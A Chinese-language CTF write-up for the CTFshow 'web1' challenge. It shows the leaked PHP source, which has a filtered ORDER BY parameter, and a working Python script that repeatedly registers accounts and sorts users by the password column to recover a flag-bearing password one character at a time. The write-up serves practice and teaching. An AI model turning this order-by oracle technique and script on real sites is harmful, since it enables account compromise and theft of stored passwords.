Write-Up for CTFshow web1

先手工测试了一遍没什么思路

然后觉得可能有源码，扫描到了www.zip

通读源码，发现对用户提交的数据进行了严格的过滤，尤其是过滤了引号，没办法实现注入。

入手点应该在user_main.php

<?php
	
	if(isset($_SESSION["login"]) && $_SESSION["login"] === true){
		$con = mysqli_connect("localhost","root","root","web15");
		if (!$con)
		{
			die('Could not connect: ' . mysqli_error());
		}
		$order=$_GET['order'];
		if(isset($order) && strlen($order)<6){
			if(preg_match("/group|union|select|from|or|and|regexp|substr|like|create|drop|\,|\`|\~|\!|\@|\#|\%|\^|\&|\*|\(|\)|\（|\）|\-|\_|\+|\=|\{|\}|\[|\]|\;|\:|\'|\’|\“|\"|\<|\>|\?|\,|\.|\?/i",$order)){
				die("error");
			}
			$sql="select * from user order by $order";
		}else{
			$sql="select * from user order by id";
		}
?>

既然题目允许通过order by排序，那通过将密码列排序可以推测出密码的每一位究竟是什么字符。

import requests
import hashlib

url = "http://69f3d937-7341-4f28-b8e6-fdca3b1a2727.challenge.ctf.show/"

def reg(password):
	data = {"username":password, "email":"1", "nickname":"1", "password":password}
	r = requests.post(url=url+"reg.php", data=data, allow_redirects=False)
	if r.status_code == 302:
		return True
	else:
		return False

def login(username, password):
	# proxy = {"http":"http://127.0.0.1:8080"}
	data = {"username": username, "password": hashlib.md5(password.encode()).hexdigest()}
	s = requests.session()
	r = s.post(url=url+"login.php", data=data, allow_redirects=False)
	# print(r.headers)
	if r.headers["location"] == "/user_main.php?order=id":
		return s
	else:
		print("login error!")
		return None

key = "-.0123456789:abcdefghijklmnopqrstuvwxyz{|}~"
reg(hashlib.md5("check".encode()).hexdigest())
session = login(hashlib.md5("check".encode()).hexdigest(), "check")
pwd = ["-"] * 100
for i in range(len(pwd)):
	for x in range(len(key)):
		pwd[i] = key[x]
		_pwd = "".join(pwd)
		if reg(_pwd):
			r = session.get(url=url+"user_main.php?order=pwd")
			if _pwd in r.text.split("flag_is_my_password")[1]:
				pwd[i] = key[x-1]
				print("".join(pwd))
				break